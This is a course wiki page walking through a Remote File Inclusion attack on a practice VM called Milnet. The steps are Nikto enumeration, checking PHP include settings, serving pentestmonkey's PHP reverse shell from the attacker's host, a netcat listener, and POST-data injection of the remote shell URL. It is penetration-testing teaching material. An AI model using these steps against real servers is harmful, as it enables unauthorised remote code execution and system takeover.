Web Apps: RFI - Paiet/SEC-335 GitHub Wiki

RFI (Remote File Inclusion) (example VM: Milnet)
- Allows you to execute arbitrary code from a file on a remote server
- This works because...
  - The vulnerable server is configured to allow it
    - Check /info.php for
      - allow_url_fopen = on
      - allow_url_include = on
  - The website is using an include statement
  - The website is configured to point to a file as input
    - You see this with POST parameters
- Enumeration
  - How do we find if the site is vulnerable?
    - Look at the source code of the pages on target server
    - Web vulnerability scanners
      - Nikto
        
        nikto -h 192.168.219.156 > Nikto.scan
      - dirb (directory buster)
- Exploitation
  - Attacking tools that will help make this easy
    - Hackbar (Firefox plugin)
    - Tamperdata (Firefox plugin)
    - BurpSuite
  - Reverse Shell
    - pentestmonkey php-reverse-shell
      - http://pentestmonkey.net/tools/web-shells/php-reverse-shell
    - Will be served up by web server
      - Apache
      - nginx
  - Start Attack!
    - Run Nikto scan
      - Possible RFI found through /info.php
    - Browse to http://192.168.219.156/info.php
      - Found
        
        allow_url_fopen = on
        
        allow_url_include = on
        
        Good info here :)
    - Browse to main page
      - http://192.168.219.156
        
        Looks like there is a Navigation frame and a main page frame
        
        Let's view source code of the main page
        
        Right-click > view source
        
        or
        
        curl -v http://192.168.219.156
        
        Found web pages
        
        nav.php
        
        main.php
        
        Following nav.php takes me to the Navigation page (w/o frame)
        
        Following main.php take me to graphic for Milnet
        
        More source code peeping
        
        curl -v http://192.168.219.156/nav.php
        
        We've struck gold!
        
        Looks like all links take you to the same page
        
        content.php
        
        It does this through HTTP POST method via the buttons on the nav.php page
        
        Prepare web server to serve up php-reverse-shell.php
        
        Download php-reverse-shell.php from pentestmonkey site
        
        Copy to /var/www/html (or wherever your web-root is)
        
        Make sure web server is started
        
        ~$ service apache2 restart
        
        Modify php-reverse-shell.php to work with your environment
        
        Change server IP and listening PORT to your netcat listener
        
        Start netcat listener to accept reverse shell connection
        
        nc -nlvp 9999
        
        Time to fire up Tamperdata/BurpSuite/Hackbar
        
        Start Tamper
        
        Modify POST data
        
        Clear existing POST data
        
        Type in: http://192.168.219.146/php-reverse-shell.php
        
        Press OK
        
        Looks like there's a problem. NO REVERSE SHELL!
        
        Check apache access logs
        
        ~$ tail /var/log/apache2/access.log
        
        Log reads: GET /php-reverse-shell.php.php
        
        Target site is adding .php to our file making it invalid
        
        Fix by renaming file without the .php extension
        
        ~$ cp php-reverse-shell.php phpshell
        
        Run tamperdata again
        
        Still no reverse shell
        
        Check apache log again
        
        GET request looks good now
        
        My Apache server config may need tweaking
        
        Easy fix
        
        Use python to create quick/dirty web server
        
        ~$ python -m SimpleHTTPServer 8888
        
        Make sure you're in the same dir as phpshell or you'll get File not Found
        
        Run tamperdata again
        
        Change POST data to...
        
        http://192.168.219.146:8888/phpshell
        
        Welcome to SHELL :)